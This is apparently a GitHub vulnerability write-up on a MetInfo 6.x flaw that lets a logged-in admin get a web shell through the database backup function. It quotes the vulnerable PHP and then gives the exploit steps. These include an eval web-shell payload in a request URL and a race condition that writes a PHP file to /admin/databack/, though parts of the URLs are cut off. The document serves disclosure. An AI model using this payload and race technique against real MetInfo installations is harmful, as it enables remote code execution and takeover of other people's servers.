Branch: master
Find file Copy path
Fetching contributors…
Cannot retrieve contributors at this time
75 lines (71 sloc) 2.95 KB

The MetInfo 6.x background getshell

Description: An issue was discovered in Metinfo 6.x.An attacker can use backend database backup function to get the web shell.

1.Technical Description:

locate in /app/system/databack/admin/index.class.php line:456 to 478:

  public function dogetsql($table='') {
        global $_M;
        if($_M['form']['tables'] && !$table)$table = $_M['form']['tables'];
        $fileid = isset($_M['form']['fileid']) ? $_M['form']['fileid'] : 1;
            $random = isset($_M['form']['random']) ? $_M['form']['random'] : met_rand(6);
            $this->docache_write('bakup_tables.php', $tables);
            $random = isset($_M['form']['random']) ? $_M['form']['random'] : met_rand(6);

If we post a string type '$tables',the program will execute docache_write locate in line 334 to 351:

  function docache_write($file, $string, $type = 'array'){
  	    global $_M;
   		$type = strtolower($type);
   		if($type == 'array')
   			$string = "<?php\n return ".var_export($string,TRUE).";\n?>";
   		elseif($type == 'constant')
   			foreach($string as $key => $value) $data .= "define('".strtoupper($key)."','".addslashes($value)."');\n";
   			$string = "<?php\n".$data."\n?>";
   	file_put_contents(PATH_WEB.ADMIN_FILE.'/databack/'.$file, $string);

It will create a file named 'bakup_tables.php' locate in /admin/databack/,and we can control the content. But in the end of the function dogetsql,the program will delete the tmpfile 'bakup_tables.php'.

	$this->docache_delete('bakup_tables.php', $tables);

So we need to use Race condition to get the code is executed


Use the Google Chrome open this test the latest version( build a test site. After the administrator logged in. image We use this url:<?php eval($_GET[2]);?>&fileid=1

image At the same time.We use Race condition.'info.php','<?php%20phpinfo();?>');

image Then we can get shell /admin/databack/info.php: image